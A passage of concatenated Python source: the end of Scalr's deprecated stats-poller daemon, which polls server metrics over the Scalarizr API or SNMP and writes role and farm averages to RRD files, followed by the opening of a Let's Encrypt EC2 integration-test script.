    'RRA:AVERAGE:0.5:6:800',
    'RRA:AVERAGE:0.5:24:800',
    'RRA:AVERAGE:0.5:288:800',
    'RRA:MAX:0.5:1:800',
    'RRA:MAX:0.5:6:800',
    'RRA:MAX:0.5:24:800',
    'RRA:MAX:0.5:288:800',
    'RRA:LAST:0.5:1:800',
    'RRA:LAST:0.5:6:800',
    'RRA:LAST:0.5:24:800',
    'RRA:LAST:0.5:288:800'
]
# Daemon defaults (overridden from the YAML config / command line elsewhere).
CONFIG = {
    'farm_procs':1,
    'serv_thrds':30,
    'rrd_thrds':2,
    'with_snmp':False,
    'no_daemon':False,
    'metrics':['cpu', 'la', 'mem', 'net'],
    'instances_connection_policy':'public',
    'instances_connection_timeout':10,
    'rrd_db_dir':'/tmp/rrd_db_dir',
    'pid_file':'/var/run/scalr.stats-poller.pid',
    'log_file':'/var/log/scalr.stats-poller.log',
    'verbosity':1,
    'interval':None
}
# Shared module logger.
LOG = logging.getLogger('ScalrPy')
def post_processing(results):
    """ Calculating role average, farm average, role servers summary, farm servers summary """
    # ra/fa: running averages per role / per farm.
    # ras/fas: per-metric sample counts used as the averaging denominators.
    # rs/fs: running-server counts per role / per farm.
    ra = {}
    fa = {}
    ras = {}
    fas = {}
    rs = {}
    fs = {}
    for result in results:
        if not result:
            continue
        try:
            # Role key "farm_id/farm_role_id"; farm key "farm_id".
            r_key = '%s/%s' % (result['farm_id'], result['farm_role_id'])
            f_key = '%s' % result['farm_id']
            ra.setdefault(r_key, {})
            fa.setdefault(f_key, {})
            ras.setdefault(r_key, {})
            fas.setdefault(f_key, {})
            # EAFP increment of the running-server counters.
            try:
                rs[r_key]['servers']['s_running'] += 1
            except KeyError:
                rs.setdefault(r_key, {'servers':{'s_running':1}})
            try:
                fs[f_key]['servers']['s_running'] += 1
            except KeyError:
                fs.setdefault(f_key, {'servers':{'s_running':1}})
            for metric_group, metrics in result['data'].iteritems():
                ra[r_key].setdefault(metric_group, {})
                fa[f_key].setdefault(metric_group, {})
                ras[r_key].setdefault(metric_group, {})
                fas[f_key].setdefault(metric_group, {})
                for metric, value in metrics.iteritems():
                    ra[r_key][metric_group].setdefault(metric, None)
                    fa[f_key][metric_group].setdefault(metric, None)
                    ras[r_key][metric_group].setdefault(metric, 0)
                    fas[f_key][metric_group].setdefault(metric, 0)
                    if value is not None:
                        # Incremental mean: new = old * (n-1)/n + value/n.
                        ras[r_key][metric_group][metric] += 1
                        if ra[r_key][metric_group][metric] is None:
                            ra[r_key][metric_group][metric] = value
                        else:
                            k = float(ras[r_key][metric_group][metric]-1) /\
                                    float(ras[r_key][metric_group][metric])
                            ra[r_key][metric_group][metric] = \
                                    ra[r_key][metric_group][metric] * k + value /\
                                    ras[r_key][metric_group][metric]
                        fas[f_key][metric_group][metric] += 1
                        if fa[f_key][metric_group][metric] is None:
                            fa[f_key][metric_group][metric] = value
                        else:
                            k = float(fas[f_key][metric_group][metric]-1) /\
                                    float(fas[f_key][metric_group][metric])
                            fa[f_key][metric_group][metric] = \
                                    fa[f_key][metric_group][metric] * k + value /\
                                    fas[f_key][metric_group][metric]
        except:
            LOG.error(helper.exc_info())
    return ra, fa, rs, fs
def server_thread(args):
    """Poll a single server's metrics and queue its RRD update.

    *args* is a (task, rrd_pool) pair.  Tries the Scalarizr API first and
    falls back to SNMP when enabled.  Returns a result dict for
    post_processing(), or None on failure.
    """
    try:
        task, rrd_pool = args
        if not task:
            return
        try:
            host = task['host']
            port = task['api_port']
            key = task['srz_key']
            os_type = task['os_type']
            metrics = task['metrics']
            proxy = task['proxy']
            data = ScalarizrAPI.get(
                    host=host, port=port, key=key, os_type=os_type, metrics=metrics, proxy=proxy)
        except:
            LOG.warning('%s:%s scalarizr api failed: %s'
                    % (task['host'], task['api_port'], helper.exc_info()))
            # Fallback path: query the same metrics over SNMP, if enabled.
            if CONFIG['with_snmp']:
                try:
                    host = task['host']
                    port = task['snmp_port']
                    community = task['community']
                    metrics = task['metrics']
                    data = SNMP.get(host=host, port=port, community=community, metrics=metrics)
                except:
                    LOG.warning('%s SNMP failed: %s' % (task['host'], helper.exc_info()))
                    return
            else:
                return
        # Per-server RRD update, keyed "farm/role/index".
        key = '%s/%s/%s' % (task['farm_id'], task['farm_role_id'], task['index'])
        rrd_pool.map_async(RRDWorker().work, [{'server':{key:data}}])
        result = {'farm_id':task['farm_id'], 'farm_role_id':task['farm_role_id'],
                'index':task['index'], 'data':data}
    except:
        LOG.error(helper.exc_info())
        result = None
    return result
def farm_process(tasks):
    """Process one chunk of per-server polling tasks in a worker process.

    Fans *tasks* out to a thread pool, aggregates the results into role/farm
    averages and running-server counts, and schedules RRD updates for each.
    """
    if not tasks:
        return
    # Bug fix: the pools used to be created inside the try block, so a
    # failure during pool construction made the finally clause raise
    # NameError on the undefined pool variables.
    servs_pool = pool.ThreadPool(processes=CONFIG['serv_thrds'])
    rrd_pool = pool.ThreadPool(processes=CONFIG['rrd_thrds'])
    try:
        results = servs_pool.map(server_thread, [(t, rrd_pool) for t in tasks])
        if not results:
            return
        ra, fa, rs, fs = post_processing(results)
        # Schedule RRD updates for role averages, farm averages and the
        # role/farm running-server counters.
        for k, v in ra.iteritems():
            rrd_pool.map_async(RRDWorker().work, [{'ra':{k:v}}])
        for k, v in fa.iteritems():
            rrd_pool.map_async(RRDWorker().work, [{'fa':{k:v}}])
        for k, v in rs.iteritems():
            rrd_pool.map_async(RRDWorker().work, [{'rs':{k:v}}])
        for k, v in fs.iteritems():
            rrd_pool.map_async(RRDWorker().work, [{'fs':{k:v}}])
    except:
        LOG.error(helper.exc_info())
    finally:
        # Close and join both pools exactly once (a redundant early
        # servs_pool.close() was removed).
        servs_pool.close()
        servs_pool.join()
        rrd_pool.close()
        rrd_pool.join()
class StatsPoller(basedaemon.BaseDaemon):
    """Daemon that periodically polls server metrics and updates RRD files.

    Each iteration runs in a child process with a 300 s timeout; tasks are
    produced from the Scalr MySQL database and dispatched to a process pool
    (see farm_process).
    """
    def __init__(self):
        super(StatsPoller, self).__init__(pid_file=CONFIG['pid_file'])
        self._db_manager = dbmanager.DBManager(CONFIG['connections']['mysql'], autoflush=False)
    def __call__(self):
        """One polling iteration: build tasks from the DB and process them."""
        try:
            tasks = self._produce_tasks()
            if tasks:
                self._process_tasks(tasks)
        except db_exc.SQLAlchemyError:
            LOG.error(helper.exc_info())
        except:
            LOG.exception('Exception')
    def run(self):
        """Main loop: run each iteration in a separate process, killing it
        after 300 s, then sleep until the next CONFIG['interval'] boundary
        (a falsy interval means run once and exit)."""
        while True:
            start_time = time.time()
            LOG.info('Start iteration')
            p = mp.Process(target=self.__call__, args=())
            p.start()
            p.join(300)
            if p.is_alive():
                LOG.error('Timeout. Terminating ...')
                try:
                    helper.kill_ps(p.pid, child=True)
                except:
                    LOG.exception('Exception')
                p.terminate()
            LOG.info('Working time: %s' % (time.time() - start_time))
            if not CONFIG['interval']:
                break
            sleep_time = start_time + CONFIG['interval'] - time.time()
            if sleep_time > 0:
                time.sleep(sleep_time)
    def start(self, daemon=False):
        """Run as a daemonized process when *daemon* is true, else inline."""
        if daemon:
            super(StatsPoller, self).start()
        else:
            self.run()
    def restart(self, daemon=False):
        """Stop the running daemon and start it again."""
        self.stop()
        self.start(daemon=daemon)
    def _get_clients(self):
        # Active Scalr clients.
        db = self._db_manager.get_db()
        clients = db.session.query(db.clients.id).filter_by(status='Active')
        return clients
    def _get_farms(self, clients_id):
        # (id, hash) of farms owned by the given clients.
        db = self._db_manager.get_db()
        farms = db.session.query(
                db.farms.id, db.farms.hash).filter(
                db.farms.clientid.in_(clients_id))
        return farms
    def _filter_vpc_farms(self, farms_id):
        # Subset of farms_id that have an ec2.vpc.id setting.
        db = self._db_manager.get_db()
        where = and_(
                db.farm_settings.farmid.in_(farms_id),
                db.farm_settings.name=='ec2.vpc.id',
                db.farm_settings.value!='NULL')
        return [farm.farmid for farm in \
                db.session.query(db.farm_settings.farmid).filter(where)]
    def _get_vpc_router_roles(self, farms_id):
        # Map farm_id -> farm_role id of that farm's 'router' behavior role.
        db = self._db_manager.get_db()
        where = and_(
                db.role_behaviors.behavior=='router')
        vpc_roles = db.session.query(db.role_behaviors.role_id).filter(where)
        where = and_(
                db.farm_roles.role_id.in_([behavior.role_id for behavior in vpc_roles]),
                db.farm_roles.farmid.in_(farms_id))
        return dict((el.farmid, el.id) for el in db.session.query(
                db.farm_roles.farmid, db.farm_roles.id).filter(where))
    def _get_servers(self, farms_id):
        # All 'Running' servers for the given farms.
        db = self._db_manager.get_db()
        servers = db.session.query(db.servers.server_id, db.servers.farm_id,
                db.servers.farm_roleid, db.servers.index, db.servers.remote_ip,
                db.servers.local_ip, db.servers.env_id, db.servers.os_type).filter(and_(
                db.servers.farm_id.in_(farms_id),
                db.servers.status=='Running'))
        return servers
    def _get_env_statuses(self, environments_id):
        # (id, status) pairs for the given environments.
        db = self._db_manager.get_db()
        statuses = db.session.query(
                db.client_environments.id, db.client_environments.status).filter(
                db.client_environments.id.in_(environments_id))
        return statuses
    def _get_snmp_ports(self, servers_id):
        # Per-server scalarizr.snmp_port property values.
        db = self._db_manager.get_db()
        where_port = and_(
                db.server_properties.server_id.in_(servers_id),
                db.server_properties.name=='scalarizr.snmp_port',
                db.server_properties.value!='NULL')
        snmp_ports = db.session.query(db.server_properties.server_id,
                db.server_properties.value).filter(where_port)
        return snmp_ports
    def _get_api_ports(self, servers_id):
        # Per-server scalarizr.api_port property values.
        db = self._db_manager.get_db()
        where_port = and_(
                db.server_properties.server_id.in_(servers_id),
                db.server_properties.name=='scalarizr.api_port',
                db.server_properties.value!='NULL')
        api_ports = db.session.query(db.server_properties.server_id,
                db.server_properties.value).filter(where_port)
        return api_ports
    def _get_srz_keys(self, servers_id):
        # Per-server scalarizr.key property values (non-empty only).
        db = self._db_manager.get_db()
        where_key = and_(
                db.server_properties.server_id.in_(servers_id),
                db.server_properties.name=='scalarizr.key',
                db.server_properties.value!='NULL',
                db.server_properties.value!='')
        srz_keys = db.session.query(db.server_properties.server_id,
                db.server_properties.value).filter(where_key)
        return srz_keys
    def _produce_tasks(self):
        """Build one polling task dict per running server in an active
        environment, resolving its address per the connection policy and
        handling VPC routing (proxy through the router role)."""
        tasks = []
        db = self._db_manager.get_db()
        try:
            clients = self._get_clients()
            if not clients:
                return
            farms = self._get_farms([client.id for client in clients])
            if not farms:
                return
            servers = self._get_servers([farm.id for farm in farms])
            if not servers:
                return
            servers_id = [server.server_id for server in servers]
            vpc_farms_id = self._filter_vpc_farms([farm.id for farm in farms])
            vpc_router_roles = self._get_vpc_router_roles(vpc_farms_id)
            env_statuses = dict((el.id, el.status)
                    for el in self._get_env_statuses([server.env_id for server in servers]))
            api_ports = dict((el.server_id, el.value)
                    for el in self._get_api_ports(servers_id))
            srz_keys = dict((el.server_id, el.value)
                    for el in self._get_srz_keys(servers_id))
            snmp_ports = dict((el.server_id, el.value)
                    for el in self._get_snmp_ports(servers_id))
            # The farm hash doubles as the SNMP community string.
            communities = dict((farm.id, farm.hash) for farm in farms)
            for server in servers:
                try:
                    if env_statuses[server.env_id] != 'Active':
                        continue
                    # Pick the address per the configured connection policy.
                    ip = {
                        'public':server.remote_ip,
                        'local':server.local_ip,
                        'auto':server.remote_ip
                        if server.remote_ip else server.local_ip
                    }[CONFIG['instances_connection_policy']]
                    # Windows servers have no load-average metric.
                    if server.os_type == 'linux':
                        metrics = CONFIG['metrics']
                    elif server.os_type == 'windows':
                        metrics = [metric for metric in CONFIG['metrics'] if metric != 'la']
                    task = {
                        'farm_id':server.farm_id,
                        'farm_role_id':server.farm_roleid,
                        'index':server.index,
                        'metrics':metrics}
                    try:
                        task['srz_key'] = srz_keys[server.server_id]
                    except:
                        LOG.warning('Scalarizr key not found for server %s' % server.server_id)
                    try:
                        task['api_port'] = api_ports[server.server_id]
                    except:
                        # Default Scalarizr API port.
                        task['api_port'] = 8010
                    task['proxy'] = None
                    task['os_type'] = server.os_type
                    if server.farm_id in vpc_farms_id:
                        # VPC farm: reach private servers via the router
                        # role's public IP, proxying with receiver headers.
                        if server.farm_id in vpc_router_roles:
                            if server.remote_ip:
                                ip = server.remote_ip
                            else:
                                where = and_(
                                    db.farm_role_settings.farm_roleid==vpc_router_roles[server.farm_id],
                                    db.farm_role_settings.name=='router.vpc.ip',
                                    db.farm_role_settings.value!='NULL')
                                ip_query = db.session.query(
                                    db.farm_role_settings.value).filter(where).first()
                                if ip_query:
                                    ip = None
                                    headers = {
                                        'X-Receiver-Host':server.local_ip,
                                        'X-Receiver-Port':task['api_port']}
                                    task['proxy'] = {
                                        'headers':headers,
                                        'host':ip_query.value,
                                        'port':80}
                                else:
                                    continue
                    else:
                        # Non-VPC Linux servers may also be polled via SNMP.
                        if server.os_type != 'windows':
                            task['community'] = communities[server.farm_id]
                            try:
                                task['snmp_port'] = snmp_ports[server.server_id]
                            except:
                                task['snmp_port'] = 161
                    task['host'] = ip
                    tasks.append(task)
                except:
                    LOG.error(helper.exc_info())
        finally:
            db.session.remove()
        return tasks
    def _compose_tasks(self, tasks):
        """Group tasks by farm and pack whole farms into roughly equal
        chunks, one chunk per worker process.

        NOTE(review): Python 2 integer division here; under Python 3 the
        `/` would yield a float chunk_length.
        """
        farm_tasks = {}
        for task in tasks:
            farm_tasks.setdefault(task['farm_id'], []).append(task)
        chunks = [[]]
        chunk_length = len(tasks) / CONFIG['farm_procs']
        for tasks_ in farm_tasks.values():
            if len(chunks[-1]) >= chunk_length:
                chunks.append([])
            chunks[-1] += tasks_
        return chunks
    def _process_tasks(self, tasks):
        """Dispatch task chunks to a multiprocessing pool of farm workers."""
        chunks = self._compose_tasks(tasks)
        if not chunks:
            return
        farms_pool = mp.Pool(processes=CONFIG['farm_procs'])
        try:
            farms_pool.map_async(farm_process, chunks)
        finally:
            farms_pool.close()
            farms_pool.join()
class SNMP(object):
    """Collects metric values from a host via SNMP v1 (net-snmp bindings)."""

    @staticmethod
    def get(host=None, port=None, community=None, metrics=None):
        """Query host:port with the given community string and return
        {metric_group: {metric_name: float_or_None}} for the requested
        metric groups (keys of the module-level `oids_data` mapping).
        """
        assert host and port and community and metrics
        # Flatten the OIDs of every requested metric group into one list.
        oids = []
        for k, v in oids_data.iteritems():
            if k in metrics:
                for kk, vv in v.iteritems():
                    oids.append(vv)
        # Imported lazily so the module can be loaded where net-snmp is absent.
        import netsnmp
        session = netsnmp.Session(
            DestHost = '%s:%s' %(host, port),
            Version = 1,
            Community = community,
            Timeout=2000000)  # net-snmp timeout is in microseconds (2s)
        Vars = netsnmp.VarList(*oids)
        # session.get() answers in the same order the OIDs were requested.
        snmp_data = dict((oid, val) for oid, val in zip(oids, session.get(Vars)))
        data = {}
        for metric_name in metrics:
            if metric_name not in oids_data:
                continue
            for metric in oids_data[metric_name].keys():
                try:
                    value = float(snmp_data[oids_data[metric_name][metric]])
                except:
                    # Missing or non-numeric SNMP answer: report None.
                    value = None
                data.setdefault(metric_name, {}).setdefault(metric, value)
        return data
class ScalarizrAPI(object):
    """Collects CPU/LA/MEM/NET metrics from a server through the Scalarizr
    HTTP RPC API (optionally through a VPC router proxy)."""

    @staticmethod
    def _get_cpu_stat(hsp, api_type):
        """Return {'cpu': {...}} with every counter cast to float."""
        if api_type not in ['linux', 'windows']:
            raise Exception('CPU stat, unsupported api type: %s' % api_type)
        timeout = CONFIG['instances_connection_timeout']
        cpu = hsp.sysinfo.cpu_stat(timeout=timeout)
        for k, v in cpu.iteritems():
            cpu[k] = float(v)
        return {'cpu':cpu}

    @staticmethod
    def _get_la_stat(hsp, api_type):
        """Return {'la': {'la1','la5','la15'}}; load average is Linux-only."""
        if api_type != 'linux':
            raise Exception('LA stat, unsupported api type: %s' % api_type)
        timeout = CONFIG['instances_connection_timeout']
        la = hsp.sysinfo.load_average(timeout=timeout)
        return {'la':{'la1':float(la[0]), 'la5':float(la[1]), 'la15':float(la[2])}}

    @staticmethod
    def _get_mem_info(hsp, api_type):
        """Return {'mem': {...}}; Linux exposes more fields than Windows."""
        if api_type not in ['linux', 'windows']:
            raise Exception('MEM info, unsupported api type: %s' % api_type)
        timeout = CONFIG['instances_connection_timeout']
        mem = hsp.sysinfo.mem_info(timeout=timeout)
        if api_type == 'linux':
            ret = {
                'swap':float(mem['total_swap']),
                'swapavail':float(mem['avail_swap']),
                'total':float(mem['total_real']),
                'avail':None, # FIXME
                'free':float(mem['total_free']),
                'shared':float(mem['shared']),
                'buffer':float(mem['buffer']),
                'cached':float(mem['cached'])
            }
        elif api_type == 'windows':
            ret = {
                'swap':float(mem['total_swap']),
                'swapavail':float(mem['avail_swap']),
                'total':float(mem['total_real']),
                'avail':None, # FIXME
                'free':float(mem['total_free'])
            }
        else:
            # Unreachable given the check above; kept as a defensive guard.
            raise Exception('Unsupported api type: %s' % api_type)
        return {'mem':ret}

    @staticmethod
    def _get_net_stat(hsp, api_type):
        """Return {'net': {'in','out'}} byte counters for the primary NIC."""
        if api_type not in ['linux', 'windows']:
            raise Exception('NET stat, unsupported api type: %s' % api_type)
        timeout = CONFIG['instances_connection_timeout']
        net = hsp.sysinfo.net_stats(timeout=timeout)
        if api_type == 'linux':
            # NOTE(review): assumes the primary interface is 'eth0' -- confirm.
            ret = {'net':{
                'in':float(net['eth0']['receive']['bytes']),
                'out':float(net['eth0']['transmit']['bytes'])}}
        # Plain `if` (not elif) is safe: api_type was validated above, so on
        # Linux this branch is skipped and `ret` from above survives.
        if api_type == 'windows':
            for key in net:
                if re.match(r'^.* Ethernet Adapter _0$', key):
                    ret = {'net':{
                        'in':float(net[key]['receive']['bytes']),
                        'out':float(net[key]['transmit']['bytes'])}}
                    break
            else:
                # for/else: no interface name matched the expected pattern.
                raise Exception('Can\'t find \'* Ethernet Adapter _0\' pattern in api response')
        return ret

    @staticmethod
    def get(host=None, port=None, key=None, os_type=None, metrics=None, proxy=None):
        """Fetch all requested metric groups from one server.

        Network-level failures (URLError / socket.timeout) abort the whole
        poll; any other per-metric failure is only logged and the remaining
        groups are still collected. Returns {group: data} for what succeeded.
        """
        assert (host or proxy) and port and key and os_type and metrics
        if proxy:
            # Reach the server through the VPC router; the real destination
            # is carried in the X-Receiver-* headers.
            host = proxy['host']
            port = proxy['port']
            headers = proxy['headers']
        else:
            headers = None
        endpoint = 'http://%s:%s' % (host, port)
        security = rpc.Security(cryptotool.decrypt_key(key))
        hsp = rpc.HttpServiceProxy(endpoint, security=security, headers=headers)
        data = dict()
        if 'cpu' in metrics:
            try:
                data.update(ScalarizrAPI._get_cpu_stat(hsp, os_type))
            except Exception as e:
                if type(e) in (urllib2.URLError, socket.timeout): raise e
                LOG.warning('%s:%s scalarizr api CPU failed: %s'
                    % (host, port, helper.exc_info()))
        if 'la' in metrics:
            try:
                data.update(ScalarizrAPI._get_la_stat(hsp, os_type))
            except Exception as e:
                if type(e) in (urllib2.URLError, socket.timeout): raise e
                LOG.warning('%s:%s scalarizr api LA failed: %s'
                    % (host, port, helper.exc_info()))
        if 'mem' in metrics:
            try:
                data.update(ScalarizrAPI._get_mem_info(hsp, os_type))
            except Exception as e:
                if type(e) in (urllib2.URLError, socket.timeout): raise e
                LOG.warning('%s:%s scalarizr api MEM failed: %s'
                    % (host, port, helper.exc_info()))
        if 'net' in metrics:
            try:
                data.update(ScalarizrAPI._get_net_stat(hsp, os_type))
            except Exception as e:
                if type(e) in (urllib2.URLError, socket.timeout): raise e
                LOG.warning('%s:%s scalarizr api NET failed: %s'
                    % (host, port, helper.exc_info()))
        return data
class RRDWriter(object):
    """Writes one metric-group sample into an RRDTool database file,
    creating the database on first use."""

    def __init__(self, source, archive):
        # source: list of 'DS:<field>:<COUNTER|GAUGE>:...' specs -- presumably
        #   standard rrdtool DS strings; field name at index 1, type at index 2.
        # archive: list of RRA archive specs passed straight to rrdtool.create.
        self.source = source
        self.archive = archive

    def _create_db(self, rrd_db_path):
        """Create the RRD file and any missing parent directories."""
        if not os.path.exists(os.path.dirname(rrd_db_path)):
            os.makedirs(os.path.dirname(rrd_db_path))
        rrdtool.create(rrd_db_path, self.source, self.archive)

    def write(self, rrd_db_path, data):
        """Append one sample ('N:<v1>:<v2>:...', N = now) built from `data`;
        missing or invalid fields are written as 'U' (unknown)."""
        rrd_db_path = str(rrd_db_path)
        if not os.path.isfile(rrd_db_path):
            self._create_db(rrd_db_path)
        data_to_write = 'N'
        for s in self.source:
            # COUNTER fields are written as int, GAUGE fields as float.
            data_type = {'COUNTER':int, 'GAUGE':float}[s.split(':')[2]]
            try:
                data_to_write += ':%s' % (data_type)(data[s.split(':')[1]])
            except:
                # Field absent or not convertible: rrdtool's 'unknown' marker.
                data_to_write += ':U'
        LOG.debug('%s, %s, %s' %(time.time(), rrd_db_path, data_to_write))
        try:
            # Updates go through the local rrdcached daemon socket.
            rrdtool.update(rrd_db_path, "--daemon", "unix:/var/run/rrdcached.sock", data_to_write)
        except rrdtool.error, e:
            LOG.error('RRDTool update error:%s, %s' %(e, rrd_db_path))
class RRDWorker(object):
    """Routes metric tasks (keyed by farm/role/instance) to the proper RRD
    database file on disk, one writer per metric group."""

    # Shared writers: each metric group has its own DS/RRA layout.
    writers = {
        'cpu':RRDWriter(cpu_source, cpu_archive),
        'la':RRDWriter(la_source, la_archive),
        'mem':RRDWriter(mem_source, mem_archive),
        'net':RRDWriter(net_source, net_archive),
        'servers':RRDWriter(servers_num_source, servers_num_archive)}

    def _x1x2(self, farm_id):
        """Return the 'x<a>x<b>' shard directory derived from the last digit
        of farm_id, spreading databases over a fixed set of directories.
        farm_id is indexed as a string -- presumably passed as str; confirm.
        """
        i = int(farm_id[-1])-1
        # i - 5*(i/5) is i % 5 written with Python 2 integer division.
        x1 = str(i-5*(i/5)+1)[-1]
        x2 = str(i-5*(i/5)+6)[-1]
        return 'x%sx%s' % (x1, x2)

    def _process_server_task(self, task):
        # Per-instance metrics; key format: '<farm_id>/<farm_role_id>/<index>'.
        for key, data in task.iteritems():
            farm_id, farm_role_id, index = key.split('/')
            for metrics_group_name, metrics_group in data.iteritems():
                RRDWorker.writers[metrics_group_name].write(
                    '%s/%s/%s/INSTANCE_%s_%s/%sSNMP/db.rrd'\
                    % (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id, farm_role_id,
                    index, metrics_group_name.upper()), metrics_group)

    def _process_ra_task(self, task):
        # Role-average metrics; key format: '<farm_id>/<farm_role_id>'.
        for key, data in task.iteritems():
            farm_id, farm_role_id = key.split('/')
            for metrics_group_name, metrics_group in data.iteritems():
                RRDWorker.writers[metrics_group_name].write(
                    '%s/%s/%s/FR_%s/%sSNMP/db.rrd'\
                    % (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id, farm_role_id,
                    metrics_group_name.upper()), metrics_group)

    def _process_fa_task(self, task):
        # Farm-average metrics; key is the farm_id.
        for key, data in task.iteritems():
            farm_id = key
            for metrics_group_name, metrics_group in data.iteritems():
                RRDWorker.writers[metrics_group_name].write(
                    '%s/%s/%s/FARM/%sSNMP/db.rrd'\
                    % (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id,
                    metrics_group_name.upper()), metrics_group)

    def _process_rs_task(self, task):
        # Per-role servers count; key format: '<farm_id>/<farm_role_id>'.
        for key, data in task.iteritems():
            farm_id, farm_role_id = key.split('/')
            for metrics_group_name, metrics_group in data.iteritems():
                RRDWorker.writers[metrics_group_name].write(
                    '%s/%s/%s/FR_%s/SERVERS/db.rrd'\
                    % (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id, farm_role_id),
                    metrics_group)

    def _process_fs_task(self, task):
        # Per-farm servers count; key is the farm_id.
        for key, data in task.iteritems():
            farm_id = key
            for metrics_group_name, metrics_group in data.iteritems():
                RRDWorker.writers[metrics_group_name].write(
                    '%s/%s/%s/FARM/SERVERS/db.rrd'\
                    % (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id), metrics_group)

    def work(self, task):
        """Dispatch a single-key task dict {'server'|'ra'|'fa'|'rs'|'fs': ...}
        to the matching handler; any failure is logged, never raised."""
        try:
            task_name = task.keys()[0]
            if task_name == 'server':
                self._process_server_task(task[task_name])
            elif task_name == 'ra':
                self._process_ra_task(task[task_name])
            elif task_name == 'fa':
                self._process_fa_task(task[task_name])
            elif task_name == 'rs':
                self._process_rs_task(task[task_name])
            elif task_name == 'fs':
                self._process_fs_task(task[task_name])
        except:
            LOG.error(helper.exc_info())
def configure(args, config):
    """Merge the YAML config and the command-line arguments into the global
    CONFIG dict (command line wins), then set up logging.

    Raises Exception if the mandatory 'stats_poller' section is missing.
    """
    global CONFIG
    if 'instances_connection_policy' in config:
        CONFIG['instances_connection_policy'] = config['instances_connection_policy']
    if 'system' in config and 'instances_connection_timeout' in config['system']:
        CONFIG['instances_connection_timeout'] = config['system']['instances_connection_timeout']
    if 'stats_poller' not in config:
        raise Exception("Can't find 'stats_poller' section in %s" % args.config_file)
    for k, v in config['stats_poller'].iteritems():
        CONFIG.update({k:v})
    # Command-line options override the file, but only when explicitly given.
    for k, v in vars(args).iteritems():
        if v is not None:
            CONFIG.update({k:v})
    # Verbose runs get a much larger rotating log file.
    log_size = 1024*500 if CONFIG['verbosity'] < 2 else 1024*10000
    helper.configure_log(
        log_level=CONFIG['verbosity'],
        log_file=CONFIG['log_file'],
        log_size=log_size
    )
def main():
    """Entry point: parse command-line options, load configuration and
    start/stop/restart the stats-poller daemon accordingly."""
    sys.stderr.write("This script is deprecated. Instead use load_statistics.py\n\n")
    parser = argparse.ArgumentParser()
    # --start/--stop/--restart are mutually exclusive daemon actions.
    group = parser.add_mutually_exclusive_group()
    group.add_argument('--start', action='store_true', default=False, help='start daemon')
    group.add_argument('--stop', action='store_true', default=False, help='stop daemon')
    group.add_argument('--restart', action='store_true', default=False, help='restart daemon')
    parser.add_argument('--no-daemon', action='store_true', default=None,
            help="Run in no daemon mode")
    parser.add_argument('--with-snmp', action='store_true', default=None,
            help="Use snmp")
    parser.add_argument('-i', '--interval', type=int, default=None,
            help="execution interval in seconds. Default is 0 - exec once")
    parser.add_argument('-p', '--pid-file', default=None, help="Pid file")
    parser.add_argument('-l', '--log-file', default=None, help="Log file")
    parser.add_argument('-m', '--metrics', default=None, choices=['cpu', 'la', 'mem', 'net'],
            action='append', help="metrics type for processing")
    parser.add_argument('-c', '--config-file', default='./config.yml', help='config file')
    parser.add_argument('-t', '--instances-connection-timeout', type=int, default=None,
            help='instances connection timeout')
    parser.add_argument('-v', '--verbosity', default=None, action='count',
            help='increase output verbosity [0:4]. Default is 1 - Error')
    parser.add_argument('--version', action='version', version='Version %s' % __version__)
    args = parser.parse_args()
    try:
        config = yaml.safe_load(open(args.config_file))['scalr']
        configure(args, config)
    except:
        # At maximum verbosity re-raise for a full traceback; otherwise print
        # a one-line error and exit.
        if args.verbosity > 3:
            raise
        else:
            sys.stderr.write('%s\n' % helper.exc_info())
        sys.exit(1)
    try:
        socket.setdefaulttimeout(CONFIG['instances_connection_timeout'])
        daemon = StatsPoller()
        if args.start:
            LOG.info('Start')
            # Refuse to start a second copy of the daemon.
            if helper.check_pid(CONFIG['pid_file']):
                LOG.info('Another copy of process already running. Exit')
                sys.exit(0)
            daemon.start(daemon= not args.no_daemon)
        elif args.stop:
            LOG.info('Stop')
            daemon.stop()
        elif args.restart:
            LOG.info('Restart')
            daemon.restart(daemon= not args.no_daemon)
        else:
            print 'Usage %s -h' % sys.argv[0]
        LOG.info('Exit')
    except KeyboardInterrupt:
        # Ctrl-C: also terminate any child processes we spawned.
        LOG.critical(helper.exc_info())
        helper.kill_ps(mp.current_process().pid, child=True)
        sys.exit(0)
    except SystemExit:
        pass
    except Exception:
        LOG.critical('Something happened and I think I died')
        LOG.exception('Critical exception')
        sys.exit(1)
# Script entry point.
if __name__ == '__main__':
    main()
|
multitester.py | """
Letsencrypt Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies letsencrypt repo and puts it on the instances
- Runs letsencrypt tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_letsencrypt_auto_venv_only.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
                    help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
                    help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
                    help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
                    default='test_letsencrypt_auto_certonly_standalone.sh',
                    help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
#                    nargs='+',
#                    help='space-delimited list of arguments to pass to the bash test script',
#                    required=False)
parser.add_argument('--repo',
                    default='https://github.com/letsencrypt/letsencrypt.git',
